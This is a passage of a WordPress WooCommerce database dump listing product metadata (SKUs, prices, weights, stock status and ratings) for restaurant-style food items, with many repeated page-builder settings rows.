sold_individually','no'),(48424,3117,'_weight','310'),(48425,3117,'_length',''),(48426,3117,'_width',''),(48427,3117,'_height',''),(48428,3117,'_upsell_ids','a:0:{}'),(48429,3117,'_crosssell_ids','a:0:{}'),(48430,3117,'_purchase_note',''),(48431,3117,'_default_attributes','a:0:{}'),(48432,3117,'_virtual','no'),(48433,3117,'_downloadable','no'),(48434,3117,'_product_image_gallery',''),(48435,3117,'_download_limit','-1'),(48436,3117,'_download_expiry','-1'),(48437,3117,'_thumbnail_id','280'),(48438,3117,'_stock',''),(48439,3117,'_stock_status','instock'),(48440,3117,'_wc_average_rating','5.00'),(48441,3117,'_wc_rating_count','a:1:{i:5;i:1;}'),(48442,3117,'_wc_review_count','1'),(48443,3117,'_downloadable_files','a:0:{}'),(48444,3117,'_product_attributes','a:0:{}'),(48445,3117,'_product_version','3.4.3'),(48446,3117,'_price','89'),(48447,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48448,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48449,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48450,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48451,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48452,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48453,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48454,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48455,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48456,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48457,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48458,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48459,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48460,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48461,3117,'mkdf_show_new_sign_woo_meta','no'),(48462,3117,'slide_template','default'),(48463,3117,'_wpb_vc_js_status','false'),(48464,3117,'_wp_old_slug','cream-broccoli-soup'),(48465,3117,'_wp_old_slug','broccoli-soup'),(48466,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48467,3118,'_sku','PR0030'),(48468,3118,'_regular_price','58'),(48469,3118,'_sale_price',''),(48470,3118,'_sale_price_dates_from',''),(48471,3118,'_sale_price_dates_to',''),(48472,3118,'total_sales','0'),(48473,3118,'_tax_status','taxable'),(48474,3118,'_tax_class',''),(48475,3118,'_manage_stock','no'),(48476,3118,'_backorders','no'),(48477,3118,'_sold_individually','no'),(48478,3118,'_weight','310'),(48479,3118,'_length',''),(48480,3118,'_width',''),(48481,3118,'_height',''),(48482,3118,'_upsell_ids','a:0:{}'),(48483,3118,'_crosssell_ids','a:0:{}'),(48484,3118,'_purchase_note',''),(48485,3118,'_default_attributes','a:0:{}'),(48486,3118,'_virtual','no'),(48487,3118,'_downloadable','no'),(48488,3118,'_product_image_gallery',''),(48489,3118,'_download_limit','-1'),(48490,3118,'_download_expiry','-1'),(48491,3118,'_thumbnail_id','273'),(48492,3118,'_stock',''),(48493,3118,'_stock_status','instock'),(48494,3118,'_wc_average_rating','5.00'),(48495,3118,'_wc_rating_count','a:1:{i:5;i:1;}'),(48496,3118,'_wc_review_count','1'),(48497,3118,'_downloadable_files','a:0:{}'),(48498,3118,'_product_attributes','a:0:{}'),(48499,3118,'_product_version','3.4.3'),(48500,3118,'_price','58'),(48501,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48502,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48503,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48504,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48505,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48506,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48507,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48508,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48509,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48510,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48511,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48512,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48513,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48514,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48515,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48516,3118,'mkdf_show_new_sign_woo_meta','no'),(48517,3118,'slide_template','default'),(48518,3118,'_wpb_vc_js_status','false'),(48519,3118,'_wp_old_slug','sea-weed-risotto'),(48520,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48521,3119,'_sku','PR0029'),(48522,3119,'_regular_price','95'),(48523,3119,'_sale_price',''),(48524,3119,'_sale_price_dates_from',''),(48525,3119,'_sale_price_dates_to',''),(48526,3119,'total_sales','0'),(48527,3119,'_tax_status','taxable'),(48528,3119,'_tax_class',''),(48529,3119,'_manage_stock','no'),(48530,3119,'_backorders','no'),(48531,3119,'_sold_individually','no'),(48532,3119,'_weight','100'),(48533,3119,'_length',''),(48534,3119,'_width',''),(48535,3119,'_height',''),(48536,3119,'_upsell_ids','a:0:{}'),(48537,3119,'_crosssell_ids','a:0:{}'),(48538,3119,'_purchase_note',''),(48539,3119,'_default_attributes','a:0:{}'),(48540,3119,'_virtual','no'),(48541,3119,'_downloadable','no'),(48542,3119,'_product_image_gallery',''),(48543,3119,'_download_limit','-1'),(48544,3119,'_download_expiry','-1'),(48545,3119,'_thumbnail_id','278'),(48546,3119,'_stock',''),(48547,3119,'_stock_status','instock'),(48548,3119,'_wc_average_rating','4.00'),(48549,3119,'_wc_rating_count','a:1:{i:4;i:1;}'),(48550,3119,'_wc_review_count','1'),(48551,3119,'_downloadable_files','a:0:{}'),(48552,3119,'_product_attributes','a:0:{}'),(48553,3119,'_product_version','3.4.3'),(48554,3119,'_price','95'),(48555,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48556,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48557,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48558,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48559,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48560,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48561,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48562,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48563,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48564,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48565,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48566,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48567,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48568,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48569,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48570,3119,'mkdf_show_new_sign_woo_meta','no'),(48571,3119,'slide_template','default'),(48572,3119,'_wpb_vc_js_status','false'),(48573,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48574,3120,'_sku','PR0031'),(48575,3120,'_regular_price','86'),(48576,3120,'_sale_price',''),(48577,3120,'_sale_price_dates_from',''),(48578,3120,'_sale_price_dates_to',''),(48579,3120,'total_sales','0'),(48580,3120,'_tax_status','taxable'),(48581,3120,'_tax_class',''),(48582,3120,'_manage_stock','no'),(48583,3120,'_backorders','no'),(48584,3120,'_sold_individually','no'),(48585,3120,'_weight','100'),(48586,3120,'_length',''),(48587,3120,'_width',''),(48588,3120,'_height',''),(48589,3120,'_upsell_ids','a:0:{}'),(48590,3120,'_crosssell_ids','a:0:{}'),(48591,3120,'_purchase_note',''),(48592,3120,'_default_attributes','a:0:{}'),(48593,3120,'_virtual','no'),(48594,3120,'_downloadable','no'),(48595,3120,'_product_image_gallery',''),(48596,3120,'_download_limit','-1'),(48597,3120,'_download_expiry','-1'),(48598,3120,'_thumbnail_id','274'),(48599,3120,'_stock',''),(48600,3120,'_stock_status','instock'),(48601,3120,'_wc_average_rating','5.00'),(48602,3120,'_wc_rating_count','a:1:{i:5;i:1;}'),(48603,3120,'_wc_review_count','1'),(48604,3120,'_downloadable_files','a:0:{}'),(48605,3120,'_product_attributes','a:0:{}'),(48606,3120,'_product_version','3.4.3'),(48607,3120,'_price','86'),(48608,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48609,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48610,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48611,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48612,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48613,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48614,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48615,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48616,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48617,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48618,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48619,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48620,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48621,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48622,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48623,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48624,3120,'mkdf_show_new_sign_woo_meta','yes'),(48625,3120,'slide_template','default'),(48626,3120,'_wpb_vc_js_status','false'),(48627,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48628,3121,'_sku','PR0032'),(48629,3121,'_regular_price','86'),(48630,3121,'_sale_price',''),(48631,3121,'_sale_price_dates_from',''),(48632,3121,'_sale_price_dates_to',''),(48633,3121,'total_sales','0'),(48634,3121,'_tax_status','taxable'),(48635,3121,'_tax_class',''),(48636,3121,'_manage_stock','no'),(48637,3121,'_backorders','no'),(48638,3121,'_sold_individually','no'),(48639,3121,'_weight','100'),(48640,3121,'_length',''),(48641,3121,'_width',''),(48642,3121,'_height',''),(48643,3121,'_upsell_ids','a:0:{}'),(48644,3121,'_crosssell_ids','a:0:{}'),(48645,3121,'_purchase_note',''),(48646,3121,'_default_attributes','a:0:{}'),(48647,3121,'_virtual','no'),(48648,3121,'_downloadable','no'),(48649,3121,'_product_image_gallery',''),(48650,3121,'_download_limit','-1'),(48651,3121,'_download_expiry','-1'),(48652,3121,'_thumbnail_id','277'),(48653,3121,'_stock',''),(48654,3121,'_stock_status','instock'),(48655,3121,'_wc_average_rating','4.00'),(48656,3121,'_wc_rating_count','a:1:{i:4;i:1;}'),(48657,3121,'_wc_review_count','1'),(48658,3121,'_downloadable_files','a:0:{}'),(48659,3121,'_product_attributes','a:0:{}'),(48660,3121,'_product_version','3.4.3'),(48661,3121,'_price','86'),(48662,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48663,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48664,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48665,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48666,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48667,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48668,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48669,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48670,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48671,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48672,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48673,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48674,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48675,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48676,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48677,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48678,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48679,3121,'mkdf_show_new_sign_woo_meta','no'),(48680,3121,'slide_template','default'),(48681,3121,'_wpb_vc_js_status','false'),(48682,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48683,3122,'_sku','PR0033'),(48684,3122,'_regular_price','86'),(48685,3122,'_sale_price',''),(48686,3122,'_sale_price_dates_from',''),(48687,3122,'_sale_price_dates_to',''),(48688,3122,'total_sales','0'),(48689,3122,'_tax_status','taxable'),(48690,3122,'_tax_class',''),(48691,3122,'_manage_stock','no'),(48692,3122,'_backorders','no'),(48693,3122,'_sold_individually','no'),(48694,3122,'_weight','100'),(48695,3122,'_length',''),(48696,3122,'_width',''),(48697,3122,'_height',''),(48698,3122,'_upsell_ids','a:0:{}'),(48699,3122,'_crosssell_ids','a:0:{}'),(48700,3122,'_purchase_note',''),(48701,3122,'_default_attributes','a:0:{}'),(48702,3122,'_virtual','no'),(48703,3122,'_downloadable','no'),(48704,3122,'_product_image_gallery',''),(48705,3122,'_download_limit','-1'),(48706,3122,'_download_expiry','-1'),(48707,3122,'_thumbnail_id','517'),(48708,3122,'_stock',''),(48709,3122,'_stock_status','instock'),(48710,3122,'_wc_average_rating','4.00'),(48711,3122,'_wc_rating_count','a:1:{i:4;i:1;}'),(48712,3122,'_wc_review_count','1'),(48713,3122,'_downloadable_files','a:0:{}'),(48714,3122,'_product_attributes','a:0:{}'),(48715,3122,'_product_version','3.4.3'),(48716,3122,'_price','86'),(48717,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48718,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48719,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48720,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48721,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48722,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48723,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48724,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48725,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48726,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48727,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48728,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48729,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48730,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48731,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48732,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48733,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48734,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48735,3122,'mkdf_show_new_sign_woo_meta','no'),(48736,3122,'slide_template',''),(48737,3122,'_wpb_vc_js_status','false'),(48738,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48739,528,'_sku','PR0034'),(48740,528,'_regular_price','150'),(48741,528,'_sale_price','115'),(48742,528,'_sale_price_dates_from',''),(48743,528,'_sale_price_dates_to',''),(48744,528,'total_sales','0'),(48745,528,'_tax_status','taxable'),(48746,528,'_tax_class',''),(48747,528,'_manage_stock','no'),(48748,528,'_backorders','no'),(48749,528,'_sold_individually','no'),(48750,528,'_weight','350'),(48751,528,'_length',''),(48752,528,'_width',''),(48753,528,'_height',''),(48754,528,'_upsell_ids','a:0:{}'),(48755,528,'_crosssell_ids','a:0:{}'),(48756,528,'_purchase_note',''),(48757,528,'_default_attributes','a:0:{}'),(48758,528,'_virtual','no'),(48759,528,'_downloadable','no'),(48760,528,'_product_image_gallery',''),(48761,528,'_download_limit','-1'),(48762,528,'_download_expiry','-1'),(48763,528,'_thumbnail_id','520'),(48764,528,'_stock',''),(48765,528,'_stock_status','instock'),(48766,528,'_wc_average_rating','3.00'),(48767,528,'_wc_rating_count','a:1:{i:3;i:1;}'),(48768,528,'_wc_review_count','1'),(48769,528,'_downloadable_files','a:0:{}'),(48770,528,'_product_attributes','a:0:{}'),(48771,528,'_product_version','3.4.3'),(48772,528,'_price','115'),(48773,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48774,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48775,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48776,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48777,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48778,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48779,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48780,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48781,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48782,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48783,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48784,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48785,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48786,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48787,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48788,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48789,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48790,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48791,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48792,528,'mkdf_show_new_sign_woo_meta','no'),(48793,528,'slide_template','default'),(48794,528,'_wpb_vc_js_status','false'),(48795,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48796,530,'_sku','PR0035'),(48797,530,'_regular_price','50'),(48798,530,'_sale_price',''),(48799,530,'_sale_price_dates_from',''),(48800,530,'_sale_price_dates_to',''),(48801,530,'total_sales','0'),(48802,530,'_tax_status','taxable'),(48803,530,'_tax_class',''),(48804,530,'_manage_stock','no'),(48805,530,'_backorders','no'),(48806,530,'_sold_individually','no'),(48807,530,'_weight','150'),(48808,530,'_length',''),(48809,530,'_width',''),(48810,530,'_height',''),(48811,530,'_upsell_ids','a:0:{}'),(48812,530,'_crosssell_ids','a:0:{}'),(48813,530,'_purchase_note',''),(48814,530,'_default_attributes','a:0:{}'),(48815,530,'_virtual','no'),(48816,530,'_downloadable','no'),(48817,530,'_product_image_gallery',''),(48818,530,'_download_limit','-1'),(48819,530,'_download_expiry','-1'),(48820,530,'_thumbnail_id','521'),(48821,530,'_stock',''),(48822,530,'_stock_status','instock'),(48823,530,'_wc_average_rating','5.00'),(48824,530,'_wc_rating_count','a:1:{i:5;i:1;}'),(48825,530,'_wc_review_count','1'),(48826,530,'_downloadable_files','a:0:{}'),(48827,530,'_product_attributes','a:0:{}'),(48828,530,'_product_version','3.4.3'),(48829,530,'_price','50'),(48830,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48831,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48832,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48833,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48834,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48835,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48836,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48837,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48838,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48839,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48840,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48841,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48842,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48843,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48844,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48845,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48846,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48847,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48848,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48849,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48850,530,'mkdf_show_new_sign_woo_meta','no'),(48851,530,'slide_template',''),(48852,530,'_wpb_vc_js_status','false'),(48853,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48854,3123,'_sku','PR0036'),(48855,3123,'_regular_price','100'),(48856,3123,'_sale_price',''),(48857,3123,'_sale_price_dates_from',''),(48858,3123,'_sale_price_dates_to',''),(48859,3123,'total_sales','0'),(48860,3123,'_tax_status','taxable'),(48861,3123,'_tax_class',''),(48862,3123,'_manage_stock','no'),(48863,3123,'_backorders','no'),(48864,3123,'_sold_individually','no'),(48865,3123,'_weight','100'),(48866,3123,'_length',''),(48867,3123,'_width',''),(48868,3123,'_height',''),(48869,3123,'_upsell_ids','a:0:{}'),(48870,3123,'_crosssell_ids','a:0:{}'),(48871,3123,'_purchase_note',''),(48872,3123,'_default_attributes','a:0:{}'),(48873,3123,'_virtual','no'),(48874,3123,'_downloadable','no'),(48875,3123,'_product_image_gallery',''),(48876,3123,'_download_limit','-1'),(48877,3123,'_download_expiry','-1'),(48878,3123,'_thumbnail_id','519'),(48879,3123,'_stock',''),(48880,3123,'_stock_status','outofstock'),(48881,3123,'_wc_average_rating','5.00'),(48882,3123,'_wc_rating_count','a:1:{i:5;i:1;}'),(48883,3123,'_wc_review_count','1'),(48884,3123,'_downloadable_files','a:0:{}'),(48885,3123,'_product_attributes','a:0:{}'),(48886,3123,'_product_version','3.4.3'),(48887,3123,'_price','100'),(48888,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48889,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48890,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48891,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48892,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48893,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48894,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48895,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48896,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48897,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48898,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48899,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48900,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48901,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48902,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48903,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48904,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48905,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48906,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48907,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48908,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48909,3123,'mkdf_show_new_sign_woo_meta','no'),(48910,3123,'slide_template','default'),(48911,3123,'_wpb_vc_js_status','false'),(48912,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48913,3124,'_sku','PR0037'),(48914,3124,'_regular_price','120'),(48915,3124,'_sale_price',''),(48916,3124,'_sale_price_dates_from',''),(48917,3124,'_sale_price_dates_to',''),(48918,3124,'total_sales','0'),(48919,3124,'_tax_status','taxable'),(48920,3124,'_tax_class',''),(48921,3124,'_manage_stock','no'),(48922,3124,'_backorders','no'),(48923,3124,'_sold_individually','no'),(48924,3124,'_weight','150'),(48925,3124,'_length',''),(48926,3124,'_width',''),(48927,3124,'_height',''),(48928,3124,'_upsell_ids','a:0:{}'),(48929,3124,'_crosssell_ids','a:0:{}'),(48930,3124,'_purchase_note',''),(48931,3124,'_default_attributes','a:0:{}'),(48932,3124,'_virtual','no'),(48933,3124,'_downloadable','no'),(48934,3124,'_product_image_gallery',''),(48935,3124,'_download_limit','-1'),(48936,3124,'_download_expiry','-1'),(48937,3124,'_thumbnail_id','518'),(48938,3124,'_stock',''),(48939,3124,'_stock_status','instock'),(48940,3124,'_wc_average_rating','5.00'),(48941,3124,'_wc_rating_count','a:1:{i:5;i:1;}'),(48942,3124,'_wc_review_count','1'),(48943,3124,'_downloadable_files','a:0:{}'),(48944,3124,'_product_attributes','a:0:{}'),(48945,3124,'_product_version','3.4.3'),(48946,3124,'_price','120'),(48947,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48948,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48949,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48950,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48951,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48952,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48953,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48954,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48955,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48956,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48957,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48958,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48959,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48960,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48961,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48962,3124,'_vc_post_settings','a:1: